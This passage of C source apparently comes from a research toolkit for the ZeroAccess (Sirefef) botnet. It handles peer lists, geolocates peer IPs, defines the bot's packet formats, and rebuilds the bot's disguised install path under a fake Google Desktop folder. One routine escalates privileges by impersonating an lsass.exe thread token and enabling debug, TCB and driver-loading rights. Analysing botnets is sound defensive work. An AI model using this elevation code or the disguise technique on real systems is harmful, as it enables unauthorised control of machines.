(RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE)\n return 0;\n\n DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE;\n dwFlag = FILE_OVERWRITE_IF;\n\n if (Append) {\n DesiredAccess |= FILE_READ_ACCESS;\n dwFlag = FILE_OPEN_IF;\n }\n\n InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);\n\n __try {\n Status = NtCreateFile(&hFile, DesiredAccess, &attr,\n &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag,\n FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n\n if (!NT_SUCCESS(Status))\n __leave;\n\n pPosition = NULL;\n\n if (Append) {\n Position.LowPart = FILE_WRITE_TO_END_OF_FILE;\n Position.HighPart = -1;\n pPosition = &Position;\n }\n\n BlockSize = 0x7FFFFFFF;\n nBlocks = (Size / BlockSize);\n for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) {\n\n Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);\n if (!NT_SUCCESS(Status))\n __leave;\n\n ptr += BlockSize;\n BytesWritten += IoStatus.Information;\n }\n RemainingSize = Size % BlockSize;\n if (RemainingSize != 0) {\n Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL);\n if (!NT_SUCCESS(Status))\n __leave;\n BytesWritten += IoStatus.Information;\n }\n\n }\n __finally {\n if (hFile != NULL) {\n if (Flush) NtFlushBuffersFile(hFile, &IoStatus);\n NtClose(hFile);\n }\n RtlFreeUnicodeString(&NtFileName);\n }\n return BytesWritten;\n}\n\n/*\n* SfuQueryEnvironmentVariableOffset\n*\n* Purpose:\n*\n* Return offset to the given environment variable.\n*\n*/\nLPWSTR SfuQueryEnvironmentVariableOffset(\n PUNICODE_STRING Value\n)\n{\n UNICODE_STRING str1;\n PWCHAR EnvironmentBlock, ptr;\n\n EnvironmentBlock = RtlGetCurrentPeb()->ProcessParameters->Environment;\n ptr = EnvironmentBlock;\n\n do {\n if (*ptr == 0)\n return 0;\n\n RtlSecureZeroMemory(&str1, sizeof(str1));\n RtlInitUnicodeString(&str1, ptr);\n if (RtlPrefixUnicodeString(Value, &str1, TRUE))\n break;\n\n ptr += _strlen(ptr) + 1;\n\n } while (1);\n\n return (ptr + Value->Length / sizeof(WCHAR));\n}\n\n/*\n* SfuBuildBotPath\n*\n* Purpose:\n*\n* Return full path to bot in both variants.\n*\n*/\nBOOL SfuBuildBotPath(\n _Inout_ PZA_BOT_PATH Context\n)\n{\n BOOL cond = FALSE, bResult = FALSE;\n OBJECT_ATTRIBUTES obja;\n UNICODE_STRING ustr1, ustr2;\n WCHAR szRegBuffer[MAX_PATH + 1];\n HANDLE ProcessHeap;\n HANDLE hKey = NULL;\n NTSTATUS status;\n KEY_VALUE_PARTIAL_INFORMATION *pki = NULL;\n LPWSTR lpEnv;\n ULONG memIO = 0;\n LPWSTR lpLocalBotName, lpPFilesBotName;\n PVOID Wow64Information = NULL;\n\n GUID sfGUID;\n\n if (Context == NULL)\n return bResult;\n\n ProcessHeap = RtlGetCurrentPeb()->ProcessHeap;\n\n RtlSecureZeroMemory(&ustr1, sizeof(ustr1));\n\n do {\n\n if (!SfInitMD5())\n break;\n\n RtlSecureZeroMemory(&sfGUID, sizeof(sfGUID));\n SfuCalcVolumeMD5((BYTE*)&sfGUID);\n\n status = NtQueryInformationProcess(NtCurrentProcess(), ProcessWow64Information,\n &Wow64Information, sizeof(PVOID), NULL);\n if (!NT_SUCCESS(status))\n break;\n\n //query current user registry string\n if (!NT_SUCCESS(RtlFormatCurrentUserKeyPath(&ustr1)))\n break;\n\n lpLocalBotName = Context->szBotPathLocal;\n lpPFilesBotName = Context->szBotPathPFiles;\n\n RtlSecureZeroMemory(&szRegBuffer, sizeof(szRegBuffer));\n wsprintf(szRegBuffer, T_SHELL_FOLDERS_KEY, ustr1.Buffer);\n\n RtlFreeUnicodeString(&ustr1);\n\n //open User Shell Folders key to query Local AppData value\n RtlSecureZeroMemory(&ustr2, sizeof(ustr2));\n RtlInitUnicodeString(&ustr2, szRegBuffer);\n InitializeObjectAttributes(&obja, &ustr2, OBJ_CASE_INSENSITIVE, NULL, NULL);\n status = NtOpenKey(&hKey, KEY_READ, &obja);\n if (!NT_SUCCESS(status))\n break;\n\n //query value size\n RtlInitUnicodeString(&ustr2, T_LOCAL_APPDATA_VALUE);\n NtQueryValueKey(hKey, &ustr2, KeyValuePartialInformation,\n NULL, 0, &memIO);\n\n if (memIO == 0)\n break;\n\n pki = RtlAllocateHeap(ProcessHeap, HEAP_ZERO_MEMORY, memIO);\n if (pki == NULL)\n break;\n\n //query value\n status = NtQueryValueKey(hKey, &ustr2, KeyValuePartialInformation,\n pki, memIO, &memIO);\n\n if (!NT_SUCCESS(status))\n break;\n\n RtlInitUnicodeString(&ustr2, (WCHAR*)pki->Data);\n memIO = 0;\n\n //expand environment variable inside value\n RtlSecureZeroMemory(&szRegBuffer, sizeof(szRegBuffer));\n ustr1.Buffer = szRegBuffer;\n ustr1.Length = 0;\n ustr1.MaximumLength = sizeof(szRegBuffer);\n\n status = RtlExpandEnvironmentStrings_U(NULL, &ustr2, &ustr1, &memIO);\n if (!NT_SUCCESS(status)) {\n ustr1.Buffer = NULL;\n break;\n }\n\n //build result string\n _strcpy(lpLocalBotName, T_GLOBAL_LINK);\n _strcat(lpLocalBotName, szRegBuffer);\n\n wsprintf(_strend(lpLocalBotName), T_SIREFEF_DIRECTORY,\n sfGUID.Data1, sfGUID.Data2, sfGUID.Data3,\n sfGUID.Data4[0],\n sfGUID.Data4[1],\n sfGUID.Data4[2],\n sfGUID.Data4[3],\n sfGUID.Data4[4],\n sfGUID.Data4[5],\n sfGUID.Data4[6],\n sfGUID.Data4[7]);\n\n ustr1.Buffer = NULL;\n\n _strcpy(lpPFilesBotName, T_GLOBAL_LINK);\n\n if (Wow64Information == NULL) {\n lpEnv = L\"ProgramFiles=\";\n }\n else {\n lpEnv = L\"ProgramFiles(x86)=\";\n }\n\n RtlInitUnicodeString(&ustr2, lpEnv);\n lpEnv = SfuQueryEnvironmentVariableOffset(&ustr2);\n if (lpEnv) {\n _strcat(lpPFilesBotName, lpEnv);\n\n wsprintf(_strend(lpPFilesBotName), T_SIREFEF_DIRECTORY,\n sfGUID.Data1, sfGUID.Data2, sfGUID.Data3,\n sfGUID.Data4[0],\n sfGUID.Data4[1],\n sfGUID.Data4[2],\n sfGUID.Data4[3],\n sfGUID.Data4[4],\n sfGUID.Data4[5],\n sfGUID.Data4[6],\n sfGUID.Data4[7]);\n }\n\n bResult = TRUE;\n\n } while (cond);\n\n if (hKey != NULL) {\n NtClose(hKey);\n }\n\n if (ustr1.Buffer != NULL) {\n RtlFreeUnicodeString(&ustr1);\n }\n\n if (pki != NULL) {\n RtlFreeHeap(ProcessHeap, 0, pki);\n }\n return bResult;\n}\n\n/*\n* SfuWhoisInit\n*\n* Purpose:\n*\n* Establish connection with freegeoip whois service.\n*\n*/\nSOCKET SfuWhoisInit(\n VOID\n)\n{\n SOCKET Socket = 0;\n WSADATA wsaData;\n struct addrinfo *result = NULL;\n struct addrinfo hints;\n struct addrinfo *ptr = NULL;\n\n if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {\n return INVALID_SOCKET;\n }\n\n RtlSecureZeroMemory(&hints, sizeof(hints));\n hints.ai_family = AF_INET;\n hints.ai_socktype = SOCK_STREAM;\n\n if (getaddrinfo(\"freegeoip.net\", \"80\", &hints, &result) != 0)\n return INVALID_SOCKET;\n\n for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {\n if (ptr->ai_family == AF_INET) {\n\n Socket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol);\n if (Socket == INVALID_SOCKET)\n continue;\n\n if (connect(Socket, ptr->ai_addr, (int)ptr->ai_addrlen) == SOCKET_ERROR)\n continue;\n\n break;\n }\n }\n\n freeaddrinfo(ptr);\n return Socket;\n}\n\n/*\n* SfuWhoisClose\n*\n* Purpose:\n*\n* Close whois request socket.\n*\n*/\nVOID SfuWhoisClose(\n _In_ SOCKET Socket\n)\n{\n if (Socket != INVALID_SOCKET) {\n closesocket(Socket);\n }\n}\n\n/*\n* SfuWhois\n*\n* Purpose:\n*\n* Send whois query and return actual result data as unicode string.\n*\n*/\nBOOL SfuWhois(\n _In_ UINT_PTR WhoisSocket,\n _In_ ZA_PEERINFO *Peer,\n _Inout_ UNICODE_STRING *ReturnedInfo\n)\n{\n BYTE* pIP;\n int r = 0;\n unsigned long\t p = 0, c, i;\n unsigned __int64\tContentLength = 0;\n char Buffer[4096];\n\n ANSI_STRING Src;\n BOOL bResult = FALSE;\n\n if (\n (Peer == NULL) ||\n (WhoisSocket == INVALID_SOCKET) ||\n (ReturnedInfo == NULL)\n )\n {\n return bResult;\n }\n\n pIP = (BYTE*)&Peer->IP;\n\n RtlSecureZeroMemory(&Buffer, sizeof(Buffer));\n wsprintfA(Buffer, \"GET /csv/%u.%u.%u.%u HTTP/1.1\\r\\nHost: freegeoip.net\\r\\nConnection: Keep-Alive\\r\\n\\r\\n\",\n pIP[0], pIP[1], pIP[2], pIP[3]\n );\n\n send(WhoisSocket, Buffer, (DWORD)_strlen_a(Buffer), 0);\n\n do {\n RtlSecureZeroMemory(Buffer, sizeof(Buffer));\n\n r = recv(WhoisSocket, Buffer, 4096, 0);\n if (r <= 0)\n break;\n\n if ((_strncmpi_a(\"HTTP/1.0 200 \", Buffer, 13) != 0) && (_strncmpi_a(\"HTTP/1.1 200 \", Buffer, 13) != 0))\n break;\n\n c = r;\n i = 0;\n do {\n p = i;\n while ((Buffer[i] != '\\r') && (i < c))\n i++;\n if (p == i) {\n i += 2;\n break;\n }\n i += 2;\n if (_strncmpi_a(\"Content-Length: \", &Buffer[p], 16) == 0)\n ContentLength = strtou64_a(&Buffer[p + 16]);\n\n } while (i < c);\n\n if ((ContentLength < 20) || (ContentLength > 1024))\n break;\n\n RtlSecureZeroMemory(&Src, sizeof(Src));\n RtlInitString(&Src, &Buffer[i]);\n if (NT_SUCCESS(RtlAnsiStringToUnicodeString(ReturnedInfo, &Src, TRUE)))\n bResult = TRUE;\n\n r = 0;\n\n } while (r > 0);\n\n return bResult;\n}\n\n/*\n* SfuCalcVolumeMD5\n*\n* Purpose:\n*\n* Calculate MD5 from system volume information.\n*\n*/\nBOOLEAN SfuCalcVolumeMD5(\n _Inout_ PBYTE MD5Hash\n)\n{\n OBJECT_ATTRIBUTES obja;\n IO_STATUS_BLOCK iost;\n UNICODE_STRING str;\n NTSTATUS Status;\n BOOLEAN result = FALSE;\n HANDLE hVolume = NULL;\n FILE_FS_VOLUME_INFORMATION fsVolumeInfo;\n MD5_CTX ctx;\n\n if (MD5Hash == NULL)\n return result;\n\n RtlSecureZeroMemory(&str, sizeof(str));\n RtlInitUnicodeString(&str, L\"\\\\systemroot\");\n InitializeObjectAttributes(&obja, &str, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n Status = NtOpenFile(&hVolume, FILE_GENERIC_READ, &obja, &iost,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_SYNCHRONOUS_IO_NONALERT);\n\n if (NT_SUCCESS(Status)) {\n\n Status = NtQueryVolumeInformationFile(hVolume, &iost, &fsVolumeInfo,\n sizeof(FILE_FS_VOLUME_INFORMATION), FileFsVolumeInformation);\n\n if ((NT_SUCCESS(Status) || Status == STATUS_BUFFER_OVERFLOW)) {\n fsVolumeInfo.VolumeCreationTime.HighPart ^= 0x1010101;\n MD5Init(&ctx);\n MD5Update(&ctx, (unsigned char*)&fsVolumeInfo.VolumeCreationTime, sizeof(LARGE_INTEGER));\n MD5Final(&ctx);\n RtlCopyMemory(MD5Hash, &ctx.buf, 16);\n result = TRUE;\n }\n NtClose(hVolume);\n }\n return result;\n}\n\n/*\n* SfuCreateFileMappingNoExec\n*\n* Purpose:\n*\n* Map file as non executable image.\n*\n*/\nPVOID SfuCreateFileMappingNoExec(\n _In_ LPWSTR lpFileName\n)\n{\n BOOL cond = FALSE;\n NTSTATUS status;\n UNICODE_STRING usFileName;\n HANDLE hFile = NULL, hSection = NULL;\n OBJECT_ATTRIBUTES obja;\n IO_STATUS_BLOCK iost;\n SIZE_T ViewSize = 0;\n PVOID Data = NULL;\n\n RtlSecureZeroMemory(&usFileName, sizeof(usFileName));\n\n do {\n\n if (RtlDosPathNameToNtPathName_U(lpFileName, &usFileName, NULL, NULL) == FALSE)\n break;\n\n InitializeObjectAttributes(&obja, &usFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n status = NtOpenFile(&hFile, FILE_READ_ACCESS | SYNCHRONIZE,\n &obja, &iost, FILE_SHARE_READ,\n FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT);\n if (!NT_SUCCESS(status))\n break;\n\n status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,\n NULL, PAGE_READONLY, SEC_IMAGE_NO_EXECUTE, hFile);\n if (!NT_SUCCESS(status))\n break;\n\n status = NtMapViewOfSection(hSection, NtCurrentProcess(),\n (PVOID)&Data, 0, 0, NULL, &ViewSize, ViewUnmap, 0, PAGE_READONLY);\n if (!NT_SUCCESS(status))\n break;\n\n } while (cond);\n\n if (hFile != NULL) {\n NtClose(hFile);\n }\n if (hSection != NULL) {\n NtClose(hSection);\n }\n if (usFileName.Buffer != NULL) {\n RtlFreeUnicodeString(&usFileName);\n }\n return Data;\n}\n\n/*\n* SftListThreadPriv\n*\n* Purpose:\n*\n* Test unit for thread elevation check.\n*\n*/\nVOID SftListThreadPriv(\n VOID\n)\n{\n DWORD dwLen;\n BOOL bRes;\n HANDLE hToken;\n BYTE *Buffer;\n TOKEN_PRIVILEGES *pPrivs;\n WCHAR text[MAX_PATH];\n\n if (!OpenThreadToken(NtCurrentThread(), TOKEN_QUERY, FALSE, &hToken))\n return;\n\n dwLen = 0;\n bRes = GetTokenInformation(\n hToken,\n TokenPrivileges,\n NULL,\n 0,\n &dwLen\n );\n\n Buffer = LocalAlloc(LPTR, dwLen);\n if (Buffer) {\n\n bRes = GetTokenInformation(\n hToken,\n TokenPrivileges,\n Buffer,\n dwLen,\n &dwLen\n );\n\n pPrivs = (TOKEN_PRIVILEGES*)Buffer;\n for (DWORD i = 0; i < pPrivs->PrivilegeCount; i++) {\n if (pPrivs->Privileges[i].Attributes & SE_PRIVILEGE_ENABLED) {\n text[0] = 0;\n ultostr(pPrivs->Privileges[i].Luid.LowPart, text);\n _strcat(text, TEXT(\"\\r\\n\"));\n OutputDebugString(text);\n }\n }\n LocalFree(Buffer);\n }\n CloseHandle(hToken);\n}\n\n/*\n* SfuGetSystemInfo\n*\n* Purpose:\n*\n* Wrapper for NtQuerySystemInformation.\n*\n*/\nPVOID SfuGetSystemInfo(\n _In_ SYSTEM_INFORMATION_CLASS InfoClass\n)\n{\n INT\t\t\tc = 0;\n PVOID\t\tBuffer = NULL;\n ULONG\t\tSize = 0x1000;\n NTSTATUS\tstatus;\n ULONG memIO;\n PVOID hHeap = NtCurrentPeb()->ProcessHeap;\n\n do {\n Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);\n if (Buffer != NULL) {\n status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);\n }\n else {\n return NULL;\n }\n if (status == STATUS_INFO_LENGTH_MISMATCH) {\n RtlFreeHeap(hHeap, 0, Buffer);\n Buffer = NULL;\n Size *= 2;\n c++;\n if (c > 100) {\n status = STATUS_SECRET_TOO_LONG;\n break;\n }\n }\n } while (status == STATUS_INFO_LENGTH_MISMATCH);\n\n if (NT_SUCCESS(status)) {\n return Buffer;\n }\n\n if (Buffer) {\n RtlFreeHeap(hHeap, 0, Buffer);\n }\n return NULL;\n}\n\n/*\n* SfuAdjustCurrentThreadPriv\n*\n* Purpose:\n*\n* Impersonate thread and adjust privileges.\n*\n*/\nBOOL SfuAdjustCurrentThreadPriv(\n PCLIENT_ID SourceThread\n)\n{\n BOOL cond = FALSE;\n NTSTATUS status = STATUS_UNSUCCESSFUL;\n HANDLE\t\t\t hThread = NULL, hToken = NULL;\n OBJECT_ATTRIBUTES obja;\n SECURITY_QUALITY_OF_SERVICE SecurityQos;\n TOKEN_PRIVILEGES *NewState = NULL;\n ULONG uLen;\n\n do {\n\n InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\n status = NtOpenThread(&hThread, THREAD_DIRECT_IMPERSONATION, &obja, SourceThread);\n if (!NT_SUCCESS(status))\n break;\n\n SecurityQos.Length = sizeof(SecurityQos);\n SecurityQos.ImpersonationLevel = SecurityImpersonation;\n SecurityQos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;\n SecurityQos.EffectiveOnly = FALSE;\n status = NtImpersonateThread(NtCurrentThread(), hThread, &SecurityQos);\n if (!NT_SUCCESS(status))\n break;\n\n status = NtOpenThreadTokenEx(NtCurrentThread(), TOKEN_ADJUST_PRIVILEGES, FALSE, 0, &hToken);\n if (!NT_SUCCESS(status))\n break;\n\n uLen = sizeof(TOKEN_PRIVILEGES) + (6 * sizeof(LUID_AND_ATTRIBUTES));\n\n NewState = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, uLen);\n if (NewState == NULL)\n break;\n\n NewState->PrivilegeCount = 6;\n\n NewState->Privileges[0].Luid.LowPart = SE_TCB_PRIVILEGE;\n NewState->Privileges[0].Luid.HighPart = 0;\n NewState->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n NewState->Privileges[1].Luid.LowPart = SE_TAKE_OWNERSHIP_PRIVILEGE;\n NewState->Privileges[1].Luid.HighPart = 0;\n NewState->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n NewState->Privileges[2].Luid.LowPart = SE_RESTORE_PRIVILEGE;\n NewState->Privileges[2].Luid.HighPart = 0;\n NewState->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n NewState->Privileges[3].Luid.LowPart = SE_DEBUG_PRIVILEGE;\n NewState->Privileges[3].Luid.HighPart = 0;\n NewState->Privileges[3].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n NewState->Privileges[4].Luid.LowPart = SE_LOAD_DRIVER_PRIVILEGE;\n NewState->Privileges[4].Luid.HighPart = 0;\n NewState->Privileges[4].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n NewState->Privileges[5].Luid.LowPart = SE_SECURITY_PRIVILEGE;\n NewState->Privileges[5].Luid.HighPart = 0;\n NewState->Privileges[5].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n status = NtAdjustPrivilegesToken(hToken, FALSE, NewState, 0, NULL, NULL);\n\n } while (cond);\n\n if (hToken != NULL) NtClose(hToken);\n if (hThread != NULL) NtClose(hThread);\n if (NewState != NULL) RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, NewState);\n\n return NT_SUCCESS(status);\n}\n\n/*\n* SfuElevatePriv\n*\n* Purpose:\n*\n* Attempt to elevate current thread privileges by impersonating lsass thread token and adding privilegs next.\n*\n*/\nBOOL SfuElevatePriv(\n VOID\n)\n{\n BOOLEAN WasEnabled;\n BOOL cond = FALSE, bResult = FALSE;\n NTSTATUS status;\n PSYSTEM_PROCESSES_INFORMATION ProcessList = NULL, pList;\n UNICODE_STRING uLookupProcess;\n ULONG i;\n\n do {\n status = RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &WasEnabled);\n if (!NT_SUCCESS(status))\n break;\n\n ProcessList = SfuGetSystemInfo(SystemProcessInformation);\n if (ProcessList == NULL)\n break;\n\n RtlSecureZeroMemory(&uLookupProcess, sizeof(uLookupProcess));\n RtlInitUnicodeString(&uLookupProcess, L\"lsass.exe\");\n pList = ProcessList;\n\n for (;;) {\n\n if (RtlEqualUnicodeString(&uLookupProcess, &pList->ImageName, TRUE)) {\n\n for (i = 0; i < pList->ThreadCount; i++) {\n bResult = SfuAdjustCurrentThreadPriv(&pList->Threads[i].ClientId);\n if (bResult)\n break;\n }\n break;\n }\n if (pList->NextEntryDelta == 0) {\n break;\n }\n pList = (PSYSTEM_PROCESSES_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta);\n }\n\n } while (cond);\n\n if (ProcessList != NULL)\n RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, ProcessList);\n\n return bResult;\n}\n\n/*\n* SfuLoadPeerList\n*\n* Purpose:\n*\n* Load peer list from file.\n*\n*/\nNTSTATUS SfuLoadPeerList(\n _In_ OBJECT_ATTRIBUTES *ObjectAttributes,\n _In_ ZA_PEERINFO **PeerList,\n _In_ PULONG NumberOfPeers\n)\n{\n BOOL cond = FALSE;\n HANDLE hFile = NULL;\n PVOID pData = NULL;\n NTSTATUS status = STATUS_UNSUCCESSFUL;\n IO_STATUS_BLOCK iost;\n FILE_STANDARD_INFORMATION fsi;\n SIZE_T memIO;\n\n if ((NumberOfPeers == NULL) || (PeerList == NULL))\n return status;\n\n do {\n status = NtOpenFile(&hFile, FILE_READ_ACCESS | SYNCHRONIZE,\n ObjectAttributes, &iost, FILE_SHARE_READ,\n FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT);\n\n if (!NT_SUCCESS(status))\n break;\n\n RtlSecureZeroMemory(&fsi, sizeof(fsi));\n status = NtQueryInformationFile(hFile, &iost, (PVOID)&fsi, sizeof(fsi), FileStandardInformation);\n if (!NT_SUCCESS(status))\n break;\n\n if ((fsi.EndOfFile.LowPart % sizeof(ZA_PEERINFO)) != 0) {// incomplete/damaged file\n status = STATUS_BAD_DATA;\n break;\n }\n\n memIO = (SIZE_T)fsi.EndOfFile.LowPart;\n NtAllocateVirtualMemory(NtCurrentProcess(), &pData, 0, &memIO, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n if (pData == NULL) {\n status = STATUS_MEMORY_NOT_ALLOCATED;\n break;\n }\n\n status = NtReadFile(hFile, NULL, NULL, NULL, &iost, pData, fsi.EndOfFile.LowPart, NULL, NULL);\n if (NT_SUCCESS(status)) {\n *NumberOfPeers = (ULONG)(iost.Information / sizeof(ZA_PEERINFO));\n *PeerList = pData;\n }\n else {\n RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, pData);\n *NumberOfPeers = 0;\n *PeerList = NULL;\n }\n\n } while (cond);\n\n if (hFile) NtClose(hFile);\n return status;\n}\n\n/*\n* SfuCreateDirectory\n*\n* Purpose:\n*\n* Native create directory.\n*\n*/\nBOOL SfuCreateDirectory(\n _In_ OBJECT_ATTRIBUTES *ObjectAttributes\n)\n{\n NTSTATUS status;\n HANDLE DirectoryHandle;\n IO_STATUS_BLOCK IoStatusBlock;\n\n status = NtCreateFile(&DirectoryHandle,\n FILE_GENERIC_WRITE,\n ObjectAttributes,\n &IoStatusBlock,\n NULL,\n FILE_ATTRIBUTE_NORMAL,//za use hidden+system\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n FILE_OPEN_IF,\n FILE_DIRECTORY_FILE,\n NULL,\n 0);\n\n if (!NT_SUCCESS(status)) {\n return FALSE;\n }\n NtClose(DirectoryHandle);\n return TRUE;\n}\n"
},
{
"path": "Source/shared/util.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: UTIL.H\n*\n* VERSION: 1.00\n*\n* DATE: 15 Jan 2016\n*\n* ZeroAccess support routines header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#define T_SIREFEF_DIRECTORY L\"\\\\Google\\\\Desktop\\\\Install\\\\{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}\\\\#.\\\\\"\n#define T_SHELL_FOLDERS_KEY L\"%wS\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\"\n#define T_LOCAL_APPDATA_VALUE L\"Local AppData\"\n#define T_GLOBAL_LINK L\"\\\\GLOBAL??\\\\\"\n\ntypedef struct _ZA_BOT_PATH {\n\tWCHAR szBotPathLocal[MAX_PATH + 1];\n\tWCHAR szBotPathPFiles[MAX_PATH + 1];\n} ZA_BOT_PATH, *PZA_BOT_PATH;\n\nVOID SfuDecodeStream(\n\t_Inout_ unsigned char *stream,\n\t_In_ size_t size,\n\t_In_ unsigned long key\n\t);\n\nBOOL SfuBuildBotPath(\n\t_Inout_ PZA_BOT_PATH Context\n\t);\n\nULONG_PTR SfuWriteBufferToFile(\n\t_In_ PWSTR lpFileName,\n\t_In_ PVOID Buffer,\n\t_In_ SIZE_T Size,\n\t_In_ BOOL Flush,\n\t_In_ BOOL Append\n\t);\n\nBOOL SfuWhois(\n\t_In_ UINT_PTR WhoisSocket,\n\t_In_ ZA_PEERINFO *Peer,\n\t_Inout_ UNICODE_STRING *ReturnedInfo\n\t);\n\nSOCKET SfuWhoisInit(\n\tVOID\n\t);\n\nVOID SfuWhoisClose(\n\t_In_ SOCKET Socket\n\t);\n\nBOOLEAN SfuCalcVolumeMD5(\n\t_Inout_ PBYTE MD5Hash\n\t);\n\nPVOID SfuCreateFileMappingNoExec(\n\t_In_ LPWSTR lpFileName\n\t);\n\nPVOID SfuGetSystemInfo(\n\t_In_ SYSTEM_INFORMATION_CLASS InfoClass\n\t);\n\nBOOL SfuElevatePriv(\n\tVOID\n\t);\n\nVOID SftListThreadPriv(\n\tVOID\n\t);\n\nNTSTATUS SfuLoadPeerList(\n\t_In_ OBJECT_ATTRIBUTES *ObjectAttributes,\n\t_In_ ZA_PEERINFO **PeerList,\n\t_In_ PULONG NumberOfPeers\n\t);\n\nBOOL SfuCreateDirectory(\n\t_In_ OBJECT_ATTRIBUTES *ObjectAttributes\n\t);\n"
},
{
"path": "Source/shared/za.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: ZA.H\n*\n* VERSION: 1.00\n*\n* DATE: 17 Jan 2016\n*\n* ZeroAccess common structures and definitions used within all projects.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\ntypedef struct _ZA_PEERINFO {\n\tULONG IP;\n\tunion {\n\t\tULONG PortAndTimeStamp;\n\t\tstruct {\n\t\t\tULONG Port : 14;\n\t\t\tULONG TimeStamp : 18;\n\t\t} DUMMYSTRUCTNAME;\n\t} DUMMYUNIONNAME;\n} ZA_PEERINFO, *PZA_PEERINFO;\n\ntypedef struct _ZA_PACKETHEADER {\n\tULONG CRC; // CRC32\n\tULONG Command; // getL, retL\n\tULONG SessionID; // crypto-random\n\tUSHORT Opt1;\n\tUSHORT Opt2;\n} ZA_PACKETHEADER, *PZA_PACKETHEADER;\n\ntypedef struct _ZA_FILEHEADER {\n\tULONG\tName;\n\tULONG\tTime;\n\tULONG\tSize;\n\tBYTE\tSignature[128];\n} ZA_FILEHEADER, *PZA_FILEHEADER;\n\ntypedef struct _ZA_PACKET {\n\tZA_PACKETHEADER Header;\n\tZA_PEERINFO PeerList[16];\n} ZA_PACKET, *PZA_PACKET;\n\ntypedef struct _ZA_CALLHOME {\n\tULONG BotID;\n\tULONG AffMod;\n\tBYTE Country[2];\n\tBYTE OsVer;\n\tBYTE OsFlag;\n\tULONG AffId;\n\tULONG CRC; //CRC32\n} ZA_CALLHOME, *PZA_CALLHOME;\n"
},
{
"path": "Source/shared/za_crypto.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: ZA_CRYPTO.C\n*\n* VERSION: 1.01\n*\n* DATE: 18 Jan 2016\n*\n* ZeroAccess routines used for cryptography purposes.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n#include \"ea.h\"\n\n/*\n* SfcVerifyFile\n*\n* Purpose:\n*\n* Verify file to be legit ZeroAccess signed binary.\n*\n*/\nBOOL SfcVerifyFile(\n\t_In_ HCRYPTPROV hProv,\n\t_In_ HCRYPTKEY hKey,\n\t_In_ MD5_CTX *ctx,\n\t_In_ PBYTE Image,\n\t_In_ DWORD ImageSize\n\t)\n{\n\tHCRYPTHASH lh_hash = 0;\n\tULONG CRC, SignSize = 0;\n\tBYTE e_sign[128];\n\tPBYTE p_resource_sign;\n\tPIMAGE_NT_HEADERS32 phdr;\n\tBOOL bResult = 